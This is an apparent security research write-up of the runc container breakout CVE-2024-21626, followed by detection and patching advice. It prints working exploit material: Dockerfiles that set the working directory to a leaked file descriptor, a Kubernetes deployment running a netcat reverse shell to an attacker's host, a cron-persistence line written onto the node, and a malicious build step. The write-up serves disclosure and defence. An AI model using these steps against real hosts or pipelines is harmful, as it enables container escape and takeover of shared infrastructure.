runc working directory breakout (CVE-2024-21626)
by Mohit Gupta
Overview
Snyk recently identified a flaw in runc <= 1.1.11, CVE-2024-21626. This issue effectively allowed an attacker to gain access to the underlying host's filesystem, which could be used to gain privileged access to the host.
This has an impact on orchestration-based environments which use runc, such as Kubernetes. An attacker able to deploy pods into a Kubernetes environment could leverage this to perform a breakout attack onto the underlying Kubernetes nodes. This is more impactful for multi-tenant clusters, where it's common for pods from different tenants to share underlying nodes. In these cases, a breakout from a pod could allow an attacker to access pods belonging to another tenant.
This could also impact build pipelines executing in runners hosted in containerised environments, and allow an attacker to gain a foothold within a pipeline. This may enable an attacker to gain highly privileged credentials that provide access to production workloads or other sensitive environments.
Analysis
runc is a runtime commonly used to create and run containers on Linux systems, and is compliant with the Open Container Initiative (OCI) specification. This means it creates the container and can be configured with the various container-related isolation options, such as namespaces, cgroups, capabilities, etc.
A container is simply a process running on the host's kernel, leveraging various kernel features to isolate the container's process from other containers and the host itself. One of these mechanisms is giving the container a separate filesystem to use as its root filesystem. This is achieved through chroot.
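As a rough illustration of the idea (this is not how runc sets containers up internally), a process can be placed into its own namespaces and given a different root filesystem with standard tools:
# Give a shell its own PID and mount namespaces, then switch its root filesystem
# (./rootfs is assumed to contain an extracted container filesystem)
sudo unshare --fork --pid --mount chroot ./rootfs /bin/sh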
This specific issue was due to a leaked file descriptor which could be used to give a newly-created container a working directory within the host's filesystem namespace, as discussed in runc's security advisory. This would be outside of the container's chrooted filesystem.
This file descriptor leak was through /proc/self/fd/, which contains the file descriptors of the current process. runc opens a handle to the host's /sys/fs/cgroup, which is then accessible to runc within /proc/self/fd/. The exact file descriptor number can vary; however, WithSecure has had success with descriptors 7, 8 and 9 for this CVE.
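To illustrate what /proc/self/fd exposes, any process can list its own open descriptors; each entry is a symlink to whatever file the process has open on that number:
# Each entry under /proc/self/fd is a symlink to an open file of the calling process
# (0, 1 and 2 are typically the terminal; the leaked cgroup handle is held by runc's init process)
ls -l /proc/self/fd/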
When runc creates the container, an attacker could specify that the current working directory should be one of these file descriptors, for example /proc/self/fd/7/. This would have runc set the current working directory to the host's /sys/fs/cgroup, should that be open as file descriptor 7. PID 1 within the container would then have a working directory not within the container's filesystem namespace, but the host's. An attacker could use this to break out of the container and gain access to the underlying host, for example by adding an SSH key or a malicious crontab entry on the host. If the process running in the container is executing as UID 0 and there isn't a user namespace, an attacker could perform these actions as the host's root user, leading to privileged access to the host.
An example of this can be seen below using the following Dockerfile:
FROM ubuntu
# Sets the current working directory for this image
WORKDIR /proc/self/fd/7/
Upon building the above Dockerfile as test and running it, we get the following:
# Should the order of file descriptors be incorrect, we get the following error
$ docker run --rm -ti test
docker: Error response from daemon: failed to create task for container: failed to create shim task: OCI runtime create failed: runc create failed: unable to start container process: error during container init: mkdir /proc/self/fd/7: no such file or directory: unknown.
[..SNIP..]
# When file descriptors are loaded in the correct order
$ docker run --rm -ti test
shell-init: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
root@3018e221cb3a:.#
During testing we received the first error multiple times, and after about four attempts the command was successful. One indicator of success is the error retrieving current directory: getcwd error message on the last command. This signifies the getcwd call has failed, which makes sense considering the current working directory is outside of the container's filesystem namespace.
Creating a file on the host's filesystem called test-host-file and then enumerating the container's filesystem does indeed show that the container has access to the host's filesystem:
# Directory listing for the container's root filesystem
root@3018e221cb3a:.# ls /
job-working-directory: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
bin dev home lib32 libx32 mnt proc run srv tmp var
boot etc lib lib64 media opt root sbin sys usr
# Directory listing for the host's root filesystem, obtained by moving to parent directories of our current working directory
root@3018e221cb3a:.# ls ../../../../
job-working-directory: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
bin dev home lib64 mnt proc run srv test-host-file usr var
boot etc lib lost+found opt root sbin sys tmp
An alternative method of exploiting this would be to create a new process within an existing container. This translates to an underlying call to runc, with the same requirement of setting the current working directory. An example is shown below:
# Create a container without any manipulations
$ docker run --rm -d skybound/net-utils sleep infinity
bc745f35f09e2d0322b31ad5a478d107c494a8c42fdf242f3c9f73822c3531e0
# Exec into an already running container, setting the cwd to /proc/self/fd/7
$ docker exec -ti -w /proc/self/fd/7 bc745f3 bash
OCI runtime exec failed: exec failed: unable to start container process: chdir to cwd ("/proc/self/fd/7") set in config.json failed: not a directory: unknown: Are you trying to mount a directory onto a file (or vice-versa)? Check if the specified host path exists and is the expected type
[..SNIP..]
# Attempt other fds
$ docker exec -ti -w /proc/self/fd/8 bc745f3 bash
shell-init: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
root@bc745f35f09e:.#
We had varying levels of success with different file descriptors with this method. Sometimes 7 would work; other times over 100 attempts with 7 would fail and we would switch to another file descriptor. In this case, 8 worked and we were in the same position as earlier, once again as demonstrated by the error retrieving current directory: getcwd error.
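Since the correct descriptor number varies, this probing can be scripted; a rough sketch, where the container ID and descriptor range are illustrative:
# Try a range of descriptor numbers until one resolves outside the container
# (success is indicated by the getcwd error followed by an interactive shell)
for fd in $(seq 4 20); do
  echo "--- trying /proc/self/fd/$fd ---"
  docker exec -ti -w /proc/self/fd/$fd bc745f3 bash && break
done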
Switching to a Kubernetes context, the primary process can't be an interactive shell directly, as there is no interactive TTY attached to it. This can be worked around using a reverse shell. The updated Dockerfile can be seen below:
FROM ubuntu
RUN apt update; apt install -y netcat-traditional; rm -rf /var/lib/apt/lists/*
WORKDIR /proc/self/fd/7/
The main addition is the RUN command, which installs netcat, a common tool for establishing network connections. This container image was pushed to Docker Hub as withsecurelabs/cve-2024-21626.
A YAML file describing a deployment was created, which would deploy the above image into a cluster. This is shown below.
apiVersion: apps/v1
kind: Deployment
metadata:
  name: testing
spec:
  selector:
    matchLabels:
      name: testing
  template:
    metadata:
      labels:
        name: testing
    spec:
      containers:
      - name: testing
        image: withsecurelabs/cve-2024-21626
        imagePullPolicy: Always
        # HOST / PORT substituted with the attacker's listening host and port
        args: ["/usr/bin/nc", "-e", "/bin/bash", "HOST", "PORT"]
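As an illustration of the alternative discussed below, the relevant part of the pod template could instead set the working directory via the pod specification; the descriptor number here is illustrative:
    spec:
      containers:
      - name: testing
        image: withsecurelabs/cve-2024-21626
        imagePullPolicy: Always
        # Illustrative: set the working directory in the pod spec rather than the image
        workingDir: /proc/self/fd/7
        args: ["/usr/bin/nc", "-e", "/bin/bash", "HOST", "PORT"]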
It should be noted that the working directory could also be set with the workingDir field within the pod specification, as sketched above, if not through the image. After deploying this, we get the following when listing pods:
$ kubectl get pods
NAME READY STATUS RESTARTS AGE
testing-dc8fd5ccc-z2zd7 0/1 RunContainerError 0 (6s ago) 8s
This is to be expected, and describing the pod shows a similar error to the one seen with docker run.
$ kubectl describe pod
[..SNIP..]
Warning Failed 3s (x4 over 43s) kubelet Error: failed to start container "testing": Error response from daemon: failed to create task for container: failed to create shim task: OCI runtime create failed: runc create failed: unable to start container process: error during container init: mkdir /proc/self/fd/7: not a directory: unknown: Are you trying to mount a directory onto a file (or vice-versa)? Check if the specified host path exists and is the expected type
Whilst Kubernetes will attempt to restart the failing pods itself, we can force it to retry more actively and speed up the attempts with kubectl rollout restart deployment testing.
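A crude way to do this, assuming the deployment is named testing as above, is to restart the rollout in a loop until a pod starts successfully:
# Repeatedly restart the deployment to force fresh container creation attempts
while true; do
  kubectl rollout restart deployment testing
  sleep 10
  kubectl get pods
done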
After multiple attempts, WithSecure had success with the file descriptor set to 9. This was using the withsecurelabs/cve-2024-21626:9 image.
$ nc -nlvp 8080
Listening on 0.0.0.0 8080
Connection received on 34.241.73.196 48858
# list the contents of the cgroup directory
ls
blkio
cpu
cpu,cpuacct
cpuacct
cpuset
devices
freezer
hugetlb
memory
net_cls
net_cls,net_prio
net_prio
perf_event
pids
systemd
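From this reverse shell, the foothold can be extended in the ways described earlier. A minimal illustration, assuming the shell's working directory is the host's /sys/fs/cgroup and the container process is running as root on the node; the file names used here are purely illustrative:
# Walk up out of /sys/fs/cgroup to reach the node's root filesystem
ls ../../../../
# Illustrative persistence: drop a cron entry onto the node's filesystem
echo '* * * * * root touch /tmp/breakout-poc' > ../../../../etc/cron.d/breakout-poc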
So far, we've demonstrated exploiting this vulnerability by running containers through docker run and as Kubernetes pods. However, containers are also created by docker build. By adding malicious commands to a Dockerfile after the WORKDIR instruction, an attacker could execute code against the host filesystem of the machine building the image.
This can be seen with the below Dockerfile:
FROM ubuntu
WORKDIR /proc/self/fd/7
RUN cd ../../../../ && \
ls && \
echo "malicious code here"
When this Dockerfile is built, an intermediate image will be created where the working directory is set to /proc/self/fd/7, and that image is then used to create a container to run the commands within RUN.
This can be seen below:
$ docker build -t test --progress=plain --no-cache .
#0 building with "default" instance using docker driver
[..SNIP..]
#5 [2/3] WORKDIR /proc/self/fd/7
#5 CACHED
#6 [3/3] RUN cd ../../../../ && ls && echo "malicious code here"
#6 0.207 sh: 0: getcwd() failed: No such file or directory
#6 0.207 /bin/sh: 1: cd: getcwd() failed: No such file or directory
#6 0.208 bin
#6 0.208 boot
#6 0.208 dev
#6 0.208 etc
#6 0.208 home
#6 0.208 lib
#6 0.208 lib64
#6 0.208 lost+found
#6 0.208 mnt
#6 0.208 opt
#6 0.208 proc
#6 0.208 root
#6 0.208 run
#6 0.208 sbin
#6 0.208 srv
#6 0.208 sys
#6 0.208 test-host-file
#6 0.208 tmp
#6 0.208 usr
#6 0.208 var
#6 0.208 malicious code here
#6 DONE 0.2s
[..SNIP..]
As can be seen, our commands have successfully executed as part of the build, and test-host-file is also present, showing that this is the host's filesystem. This approach could be used to compromise CI/CD systems, by submitting maliciously altered Dockerfiles which are then built by the relevant CI/CD pipeline's runners.
Detection
This attack leverages the working directory when creating containers or spawning new processes within a container. As such, detection should focus on cases where /proc/self/fd/[0-9]+ is set as the working directory.
In Kubernetes, this could be set within the workingDir field as part of the pod specification; however, checking this field alone is not reliable, as the working directory could also be set within the image's configuration. Reviewing the working directory in both images and pod specifications would flag this issue.
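As a starting point, both locations can be reviewed with standard tooling; a rough sketch, where the image name is illustrative:
# Check the working directory baked into an image's configuration
docker image inspect --format '{{.Config.WorkingDir}}' suspect-image:latest
# List the workingDir set in pod specifications across the cluster
kubectl get pods -A -o jsonpath='{range .items[*]}{.metadata.namespace}{"/"}{.metadata.name}{"\t"}{.spec.containers[*].workingDir}{"\n"}{end}' | grep '/proc/self/fd'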
Additionally, WithSecure has had success with creating a symlink to /proc/self/fd in the container's filesystem and setting that symlink as the working directory. This variant can be harder to detect statically, as an attacker could add significant levels of obfuscation to it.
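For illustration, a Dockerfile using this symlink variant might look something like the following; the symlink path and descriptor number are arbitrary choices for the sketch:
FROM ubuntu
# Create a symlink to the process's file descriptor directory
RUN ln -s /proc/self/fd /tmp/fd
# Set the working directory through the symlink rather than /proc/self/fd directly
WORKDIR /tmp/fd/7/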
This attack could also be detected at runtime. Snyk has released an eBPF-based runtime detector that analyses the actual path used for the working directory, based on the underlying system calls, and ensures it is not set to a leaked file descriptor.
They have also released a static analysis tool that can analyse a Dockerfile or a Docker image. It should be noted that this could be less effective than runtime detection, as there may be false positives or negatives: it works on a static set of signatures and rules which may not comprehensively match all cases.
Mitigations
runc, and by extension software depending on runc, should be patched to runc version 1.1.12 or later. Vendors may also have their own advisories or security bulletins with recommended actions, and these should be followed where available.
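To verify which runc version a host is running, the runtime can be queried directly; for example, assuming runc is on the PATH or Docker is the container engine in use:
# Report the installed runc version directly
runc --version
# On Docker hosts, docker info also reports the bundled runc version
docker info | grep -i runc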